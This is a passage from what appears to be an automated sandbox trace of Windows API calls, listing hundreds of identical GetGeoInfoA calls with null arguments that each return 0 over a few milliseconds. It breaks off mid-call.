GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.647] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.648] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.649] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.650] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.651] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.652] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.653] GetGeoInfoA (in: Location=0x0, 